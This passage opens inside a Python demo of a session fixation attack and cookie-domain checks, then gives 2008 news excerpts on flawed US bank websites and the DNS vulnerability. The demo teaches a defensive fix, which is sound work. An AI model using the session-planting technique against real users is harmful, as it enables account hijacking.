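    planted = store.create()                  # attacker obtains a valid anonymous session
    victim = store.login(planted, "victim")   # victim authenticates carrying the planted cookie
    return {
        "planted_still_valid": store.user_for(planted) is not None,
        "victim_sid_changed": victim != planted,
        "victim_authenticated": store.user_for(victim),
        "bank_rejects_suffix": cookie_domain_acceptable("bank.co.uk", ".co.uk"),
        "bank_accepts_own": cookie_domain_acceptable("online.bank.co.uk", ".bank.co.uk"),
        "foreign_domain": cookie_domain_acceptable("bank.co.uk", ".example.com"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Regenerating the ID at login is the application-side fix the post alludes to: whatever the browser accepted, the attacker's pre-obtained session never carries the victim's identity.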

Security shocker: 75% of US bank websites have flaws

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Insecure by design
By Dan Goodin in San Francisco

The vast majority of US bank websites jeopardize the security of their online customers by including design flaws that expose passwords and are susceptible to tampering by attackers, researchers say.

In a paper titled "Analyzing Web sites for user-visible security design flaws," researchers from the University of Michigan found 75 percent of bank sites surveyed had at least one such design flaw. The report was presented Friday at the Symposium on Usable Privacy and Security meeting at Carnegie Mellon University.

More: http://www.theregister.co.uk/2008/07/25/bank_sites_insecure/

Responding to the DNS vulnerability and attacks

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Posted by Nathan McFeters

July 28th, 2008

The DNS vulnerability, which has completely dominated the news in the security world the last two weeks, has been a concern for so many. On the front of good news and getting things protected, the IBM ISS team has published some great information.

The Frequency X Blog, run by IBM ISS, had an interesting article that I think is likely useful to many of us out there. I've personally heard a few questions from my clients, some from other associates at Ernst & Young, asking about other options for mitigation, if this is being attacked in the wild, etc. Apparently IBM ISS has heard similar things. From their Frequency X Blog:

More: http://blogs.zdnet.com/security/?p=1573
